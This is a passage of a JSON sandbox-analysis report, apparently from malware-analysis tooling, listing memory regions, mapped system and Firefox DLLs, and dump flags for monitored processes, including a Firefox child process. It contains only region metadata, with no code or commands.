in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 401407, "entry_point": 0, "filename": null, "id": 
"region_1535", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:11.305", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001536-addr_0x00000000002e0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_228", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3018751, "entry_point": 0, "filename": null, "id": "region_1536", "name": "private_0x00000000002e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3014656, "timestamp": "00:01:11.305", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001537-addr_0x00000000002f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_229", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3084287, "entry_point": 0, "filename": null, "id": "region_1537", "name": "private_0x00000000002f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3080192, "timestamp": "00:01:11.306", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 5115903, "entry_point": 0, "filename": null, "id": "region_1538", "name": "pagefile_0x00000000003e0000", "norm_filename": null, "region_type": 
"pagefile_backed_memory", "start_va": 4063232, "timestamp": "00:01:11.306", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 17760255, "entry_point": 0, "filename": null, "id": "region_1539", "name": "pagefile_0x00000000004f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5177344, "timestamp": "00:01:11.306", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1454080, "start_va": 17760256, "type": "region", "version": 1 }, "end_va": 19214335, "entry_point": 0, "filename": null, "id": "region_1540", "name": "pagefile_0x00000000010f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 17760256, "timestamp": "00:01:11.306", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Program Files\\Mozilla Firefox\\Firefox.exe\"", "filename": "c:\\program files\\mozilla firefox\\firefox.exe", "id": "proc_11", "image_name": "firefox.exe", "monitor_reason": "child_process", "monitored_id": 11, "origin_monitor_id": 8, "ref_parent_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, 
"start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1797", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:49.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1798", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:49.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 274431, "entry_point": 0, "filename": null, "id": "region_1799", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:49.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 2031615, "entry_point": 0, "filename": null, "id": "region_1800", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:01:49.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 
"pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 10240000, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 12271615, "entry_point": 0, "filename": null, "id": "region_1801", "name": "pagefile_0x00000000001f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2031616, "timestamp": "00:01:49.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1089536, "start_va": 12320768, "type": "region", "version": 1 }, "end_va": 13410303, "entry_point": 0, "filename": null, "id": "region_1802", "name": "pagefile_0x0000000000bc0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 12320768, "timestamp": "00:01:49.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 278528, "start_va": 19136512, "type": "region", "version": 1 }, "end_va": 19415039, "entry_point": 0, "filename": null, "id": "region_1803", "name": "pagefile_0x0000000001240000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 19136512, "timestamp": "00:01:49.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1995767808, "type": "region", "version": 1 }, 
"end_va": 1997062143, "entry_point": 1995767808, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1804", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1995767808, "timestamp": "00:01:49.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 1998127104, "type": "region", "version": 1 }, "end_va": 1998131199, "entry_point": 1998127104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1805", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 1998127104, "timestamp": "00:01:49.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1806", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:01:49.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147323904, "type": "region", "version": 1 }, "end_va": 2147327999, "entry_point": 0, "filename": null, "id": "region_1807", "name": "private_0x000000007ffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147323904, "timestamp": 
"00:01:49.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1808", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:01:49.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 14614528, "type": "region", "version": 1 }, "end_va": 14876671, "entry_point": 0, "filename": null, "id": "region_1809", "name": "private_0x0000000000df0000", "norm_filename": null, "region_type": "private_memory", "start_va": 14614528, "timestamp": "00:01:49.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1965424640, "type": "region", "version": 1 }, "end_va": 1965727743, "entry_point": 1965424640, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1810", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965424640, "timestamp": "00:01:49.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1992359936, "type": 
"region", "version": 1 }, "end_va": 1993228287, "entry_point": 1992359936, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1811", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1992359936, "timestamp": "00:01:49.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1812", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:49.199", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1813", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:01:49.199", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 778240, "start_va": 1912602624, "type": "region", "version": 1 }, "end_va": 1913380863, "entry_point": 1912602624, "filename": "\\Program Files\\Mozilla Firefox\\msvcr100.dll", "id": "region_1814", "name": "msvcr100.dll", "norm_filename": "c:\\program files\\mozilla firefox\\msvcr100.dll", "region_type": 
"memory_mapped_file", "start_va": 1912602624, "timestamp": "00:01:49.199", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1984299008, "type": "region", "version": 1 }, "end_va": 1984339967, "entry_point": 1984299008, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1815", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1984299008, "timestamp": "00:01:49.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1985806336, "type": "region", "version": 1 }, "end_va": 1986125823, "entry_point": 1985806336, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1816", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1985806336, "timestamp": "00:01:49.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1986134016, "type": "region", "version": 1 }, "end_va": 1986957311, "entry_point": 1986134016, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1817", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1986134016, "timestamp": "00:01:49.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", 
"permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1988427776, "type": "region", "version": 1 }, "end_va": 1989070847, "entry_point": 1988427776, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1818", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1988427776, "timestamp": "00:01:49.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1994653696, "type": "region", "version": 1 }, "end_va": 1995358207, "entry_point": 1994653696, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1819", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1994653696, "timestamp": "00:01:49.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1820", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:01:49.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 13434880, "type": "region", "version": 1 }, "end_va": 14254079, "entry_point": 0, "filename": null, "id": 
"region_1821", "name": "pagefile_0x0000000000cd0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 13434880, "timestamp": "00:01:49.213", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 14483456, "type": "region", "version": 1 }, "end_va": 14548991, "entry_point": 0, "filename": null, "id": "region_1822", "name": "private_0x0000000000dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 14483456, "timestamp": "00:01:49.213", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 1984364544, "type": "region", "version": 1 }, "end_va": 1984491519, "entry_point": 1984364544, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1823", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1984364544, "timestamp": "00:01:49.213", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1992343551, "entry_point": 1991507968, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1824", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:01:49.213", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": 
"No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1825", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:49.255", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 790527, "entry_point": 0, "filename": null, "id": "region_1826", "name": "private_0x00000000000c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 786432, "timestamp": "00:01:49.255", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 14876672, "type": "region", "version": 1 }, "end_va": 15929343, "entry_point": 0, "filename": null, "id": "region_1827", "name": "pagefile_0x0000000000e30000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 14876672, "timestamp": "00:01:49.255", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 15990784, "type": "region", "version": 1 }, "end_va": 17285119, "entry_point": 15990784, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1828", "name": "ntdll.dll", "norm_filename": 
"c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 15990784, "timestamp": "00:01:49.255", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 18022400, "type": "region", "version": 1 }, "end_va": 18087935, "entry_point": 0, "filename": null, "id": "region_1829", "name": "private_0x0000000001130000", "norm_filename": null, "region_type": "private_memory", "start_va": 18022400, "timestamp": "00:01:49.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 19464192, "type": "region", "version": 1 }, "end_va": 32047103, "entry_point": 0, "filename": null, "id": "region_1830", "name": "pagefile_0x0000000001290000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 19464192, "timestamp": "00:01:49.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1967259648, "type": "region", "version": 1 }, "end_va": 1967919103, "entry_point": 1967259648, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1831", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1967259648, "timestamp": "00:01:49.267", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ 
"readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1997103103, "entry_point": 1997078528, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_1832", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:01:49.267", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997340672, "type": "region", "version": 1 }, "end_va": 1997557759, "entry_point": 1997340672, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_1833", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997340672, "timestamp": "00:01:49.268", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 868351, "entry_point": 0, "filename": null, "id": "region_1834", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:01:49.314", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1967980544, "type": "region", "version": 1 }, "end_va": 1968635903, "entry_point": 1967980544, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1835", "name": "advapi32.dll", 
"norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1967980544, "timestamp": "00:01:49.314", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989083136, "type": "region", "version": 1 }, "end_va": 1989185535, "entry_point": 1989083136, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1836", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989083136, "timestamp": "00:01:49.314", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1789952, "start_va": 1653866496, "type": "region", "version": 1 }, "end_va": 1655656447, "entry_point": 1653866496, "filename": "\\Program Files\\Mozilla Firefox\\nss3.dll", "id": "region_1837", "name": "nss3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\nss3.dll", "region_type": "memory_mapped_file", "start_va": 1653866496, "timestamp": "00:01:49.400", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 204800, "start_va": 1850802176, "type": "region", "version": 1 }, "end_va": 1851006975, "entry_point": 1850802176, "filename": "\\Windows\\System32\\winmm.dll", "id": "region_1838", "name": "winmm.dll", "norm_filename": "c:\\windows\\system32\\winmm.dll", "region_type": "memory_mapped_file", "start_va": 1850802176, "timestamp": "00:01:49.400", "type": "region", "version": 1 }, { "dump": { 
"filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 430080, "start_va": 1913454592, "type": "region", "version": 1 }, "end_va": 1913884671, "entry_point": 1913454592, "filename": "\\Program Files\\Mozilla Firefox\\msvcp100.dll", "id": "region_1839", "name": "msvcp100.dll", "norm_filename": "c:\\program files\\mozilla firefox\\msvcp100.dll", "region_type": "memory_mapped_file", "start_va": 1913454592, "timestamp": "00:01:49.400", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 139264, "start_va": 1913913344, "type": "region", "version": 1 }, "end_va": 1914052607, "entry_point": 1913913344, "filename": "\\Program Files\\Mozilla Firefox\\mozglue.dll", "id": "region_1840", "name": "mozglue.dll", "norm_filename": "c:\\program files\\mozilla firefox\\mozglue.dll", "region_type": "memory_mapped_file", "start_va": 1913913344, "timestamp": "00:01:49.414", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1914109952, "type": "region", "version": 1 }, "end_va": 1914138623, "entry_point": 1914109952, "filename": "\\Windows\\System32\\wsock32.dll", "id": "region_1841", "name": "wsock32.dll", "norm_filename": "c:\\windows\\system32\\wsock32.dll", "region_type": "memory_mapped_file", "start_va": 1914109952, "timestamp": "00:01:49.415", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ 
"readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 18087936, "type": "region", "version": 1 }, "end_va": 19136511, "entry_point": 0, "filename": null, "id": "region_1842", "name": "private_0x0000000001140000", "norm_filename": null, "region_type": "private_memory", "start_va": 18087936, "timestamp": "00:01:49.523", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1964048384, "type": "region", "version": 1 }, "end_va": 1964097535, "entry_point": 1964048384, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_1843", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1964048384, "timestamp": "00:01:49.523", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1964113920, "type": "region", "version": 1 }, "end_va": 1965281279, "entry_point": 1964113920, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_1844", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1964113920, "timestamp": "00:01:49.523", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 32505856, "type": "region", "version": 1 }, "end_va": 33554431, "entry_point": 0, "filename": null, "id": "region_1845", "name": "private_0x0000000001f00000", "norm_filename": null, 
"region_type": "private_memory", "start_va": 32505856, "timestamp": "00:01:49.567", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 33554432, "type": "region", "version": 1 }, "end_va": 36499455, "entry_point": 33554432, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1846", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 33554432, "timestamp": "00:01:49.567", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1864302592, "type": "region", "version": 1 }, "end_va": 1864462335, "entry_point": 1864302592, "filename": "\\Program Files\\Mozilla Firefox\\softokn3.dll", "id": "region_1847", "name": "softokn3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\softokn3.dll", "region_type": "memory_mapped_file", "start_va": 1864302592, "timestamp": "00:01:49.567", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1912471552, "type": "region", "version": 1 }, "end_va": 1912565759, "entry_point": 1912471552, "filename": "\\Program Files\\Mozilla Firefox\\nssdbm3.dll", "id": "region_1848", "name": "nssdbm3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\nssdbm3.dll", "region_type": "memory_mapped_file", "start_va": 1912471552, "timestamp": "00:01:49.569", "type": "region", "version": 1 }, { "dump": { "filename": "", 
